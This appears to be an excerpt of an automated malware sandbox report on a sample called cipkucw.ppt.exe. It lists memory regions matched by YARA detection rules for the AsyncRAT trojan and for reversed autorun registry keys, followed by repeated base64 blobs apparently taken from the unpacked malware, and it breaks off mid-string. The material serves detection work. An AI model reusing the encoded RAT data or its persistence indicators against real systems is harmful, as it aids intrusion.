          Source: 0000000F.00000003.2000805264.0000000003E3C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
          Source: 0000000F.00000003.2000805264.0000000003E3C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
          Source: 00000006.00000003.1873750371.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
          Source: 0000000F.00000003.2000748696.000000000174E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
          Source: 00000006.00000003.1873380040.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
          Source: 00000006.00000003.1873380040.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
          Source: 00000010.00000002.2048370610.0000000000762000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
          Source: 00000010.00000002.2048370610.0000000000762000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
          Source: 00000011.00000003.2139352487.0000000000D26000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
          Source: 00000011.00000003.2139352487.0000000000D26000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
          Source: 00000013.00000003.2219758241.0000000003CBA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
          Source: 00000013.00000003.2219758241.0000000003CBA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
          Source: 00000013.00000003.2218782677.0000000001866000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
          Source: 00000013.00000003.2218782677.0000000001866000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
          Source: 00000011.00000003.2138543622.0000000000D47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
          Source: 00000011.00000003.2138543622.0000000000D47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
          Source: 00000013.00000003.2219549632.0000000001866000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
          Source: 00000011.00000003.2138854777.0000000000D47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
          Source: 00000006.00000003.1874482943.0000000000F82000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
          Source: 00000006.00000003.1874482943.0000000000F82000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
          Source: 0000000F.00000003.2001114393.0000000001628000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
          Source: 0000000F.00000003.2001114393.0000000001628000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
          Source: 00000013.00000003.2219993576.0000000001854000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
          Source: 00000013.00000003.2219993576.0000000001854000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
          Source: Process Memory Space: RegSvcs.exe PID: 2368, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
          Source: 6.3.cipkucw.ppt.f91818.1.raw.unpack, cSqZGleJeFOouKW.csBase64 encoded string: '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
          Source: 6.3.cipkucw.ppt.fb2828.0.raw.unpack, cSqZGleJeFOouKW.csBase64 encoded string: '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
          Source: 15.3.cipkucw.ppt.exe.175e018.0.raw.unpack, cSqZGleJeFOouKW.csBase64 encoded string: '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
          Source: 17.3.cipkucw.ppt.exe.d56820.0.raw.unpack, cSqZGleJeFOouKW.csBase64 encoded string: 'U4Qta5NOYCAKfRX3jC33qn4iJmvlCu3+2OlNIb1ADi+bvYieIcjUASxy5Hfo/XsgU7sgeUhgbJoLqqK6FQ/5r9OKS7NB9ZwWVp3KswitIvfT9K0q2NNyKFIzjqpcLCva', 'k7K5ec59J6HG1d81wJWz4Ic4HulFyNRW3RGnTifOLJwybrjai/FKGT6BmKJll6227+dWDp0iw4AFIjjVC/UrKA==', 's7rNf6/P8RM612hbWaxbCsb08OwXa34ps3eEDuZZY7IeY2pYcxpjoLBsSy/NzP9gOJmy/tfMwY9cl9YTFkew6wIppiVgdh/eNfo+DBcw07k=', 'iDlwO66ny21yQKZu4/1Ack0jrqESKR2xX3BaBTW4EFWxVZ2ldP8KL6FB7zcvAmfq2zTPGLcXEmuBDUvAQJbepOEPnOkU7BEzGhSJz8w5y13ZPW6laLvDWs0rXKet9Pc78qzBPszH4QZYWzchZSuDkF7YQ6H7JVYlOOQp+ToLzM65mtX458HfPHPBfQBQDffJztfx/aZdCA2bd7R1/dN8SYoWCJi6+cPz14anguEjY1N3/wFtx3VUqoRTYZloCtHPeF2gfmIgAzafMVTy/WMgei2n+UN3UJUwn2OWDB035vMadsziLIvCB68NzElYFNpQTs8CRnTyVnYtI7J1dAGgEhm8BfV/ubEx0vFkNIWQOjGdUMx4qyZ+txfeeDPp3y6G/RQX2k1wChTiHqfibGq80sK9e8047Rr0TfEQmbMmNQrfp3gPbBhpYYNoZCoK7Uh99AUEo/s3dovxjhhM5oklLeBszsLrYvMsLhwdy32mpQhO8TYIWS2Ce1/Vjan2kIbmV6Fuc6ncz/fcXR4oXheSuS7eTg9Y5A6LFqSB89K4xIlMDHt5lDb+QupAJJ2yzM4Z3LEid9BZvpJ4YSqqUggNx9us0njwXh3Gt2Swqf5+gX3XKHdF0sxDQG+Tklwu7FFzsU2OvBFLQ7Z2RT7ArdK6gCyMvK4Gj9imsqT8QDLfllIXhLikTAyR2haH0GDfzz1pXODpL6IU5F32qEB2Fo/JBD3nts5YaEH0xYliqTH40DR2S6adAbE3gpiJpauX3Vfmkul6OsuaBLWwdlTOIpCMQRx7OqFi8T4w8ddnLL/ou3mHHvGKKkGTPbO1LxMN7bZmK1oKP2CzIh8qAm1pz+Mzt5k1EdCAtXflRy5VDEEWNsuHqlX1gTH+r5yC/W1gzxskQpxxQiqL0zYedMh2X96DnCIMyO3QzTlN3JvGLwst4Ov5rgiEo1kOuAQ84YnjCkikoZX7y7Fj7xxPxHbYPQF2HFqcN+XvdG4YhA9bXxjUL7DnykeRZrFlwhGNgxhan7MlfZd3FCZZPEPb1IQ/xZQighzPBvPdnHSaSS2YcdStncZ7lpWio62y86/6pwkriWMraHSk52yIMk0ohApRz/0LGv1pqESZUhEfsIUfpS39NNlqoqQNAMC5QHpFBWA8mdfRblUuZO6/3jsjyQ7+8KH2HN1j4OfFSs4LCnS